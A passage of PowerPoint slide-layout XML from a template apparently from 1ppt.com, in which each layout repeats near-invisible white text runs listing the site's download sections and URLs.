              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout266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66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66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66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6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67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67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67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67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67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67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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout267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67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67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67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6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68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68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68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68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68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68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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout268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68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68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68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6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69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69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69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69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69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69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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
